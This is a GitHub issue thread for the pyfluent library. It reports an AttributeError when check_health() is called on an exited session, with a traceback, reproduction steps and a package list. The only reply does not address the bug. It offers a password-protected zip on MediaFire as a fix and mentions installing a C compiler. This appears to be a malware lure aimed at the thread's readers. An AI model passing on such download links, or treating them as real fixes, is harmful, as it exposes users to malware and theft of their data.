### ISSUE TITLE
error in check_health for closed session

### ISSUE THREAD

**Issue by millerj97** [ansys/pyfluent#3410]
### 🔍 Before submitting the issue

- [X] I have searched among the existing issues
- [X] I am using a Python virtual environment

### 🐞 Description of the bug

calling check_health on a session which has been exited causes the following error;
```
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File ".build/lib/python3.10/site-packages/ansys/fluent/core/services/health_check.py", line 62, in check_health
    response = self._stub.Check(request, metadata=self._metadata)
  File ".build/lib/python3.10/site-packages/grpc/_interceptor.py", line 277, in __call__
    response, ignored_call = self._with_call(
  File ".build/lib/python3.10/site-packages/grpc/_interceptor.py", line 329, in _with_call
    call = self._interceptor.intercept_unary_unary(
  File ".build/lib/python3.10/site-packages/ansys/fluent/core/services/interceptors.py", line 122, in intercept_unary_unary
    return self._intercept_call(continuation, client_call_details, request)
  File "/.build/lib/python3.10/site-packages/ansys/fluent/core/services/interceptors.py", line 110, in _intercept_call
    ex = RuntimeError(grpc_ex.details())
AttributeError: 'ValueError' object has no attribute 'details'

```

calling `check_health()` on a pyfluent session that never existed gives;

```
>>> no_session._fluent_connection.health_check.check_health()
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
NameError: name 'no_session' is not defined

```

### 📝 Steps to reproduce

run following commands;
```
import ansys.fluent.core as pyfluent
solver = pyfluent.launch_fluent()
solver._fluent_connection.health_check.check_health()

solver.exit()
solver._fluent_connection.health_check.check_health()
```

### 💻 Which operating system are you using?

Linux

### 📀 Which ANSYS version are you using?

251

### 🐍 Which Python version are you using?

3.10

### 📦 Installed packages

```shell
about-time==4.2.1
alive-progress==3.1.5
ansys-api-fluent==0.3.28
ansys-api-platform-instancemanagement==1.1.0
ansys-api-tools-filetransfer==0.1.0
ansys-fluent-core==0.26.1
ansys-platform-instancemanagement==1.1.2
ansys-tools-filetransfer==0.1.0
ansys-units==0.3.2
beartype==0.19.0
certifi==2024.8.30
charset-normalizer==3.4.0
click==8.1.7
docker==7.1.0
grapheme==0.6.0
grpcio==1.67.0
grpcio-health-checking==1.62.3
idna==3.10
importlib_metadata==8.5.0
joblib==1.4.2
lxml==5.3.0
nltk==3.9.1
numpy==1.26.4
pandas==2.2.3
platformdirs==4.3.6
protobuf==4.25.5
psutil==6.1.0
python-dateutil==2.9.0.post0
pytz==2024.2
PyYAML==6.0.2
regex==2024.9.11
requests==2.32.3
six==1.16.0
tqdm==4.66.5
tzdata==2024.2
urllib3==2.2.3
zipp==3.20.2
```

**Comment by DaavMendonca** [comment]
try this
https://www.mediafire.com/file/33h9a2mzmqf81fz/help_github.zip/file
Pass: xfp53

you may need to install the c compiler
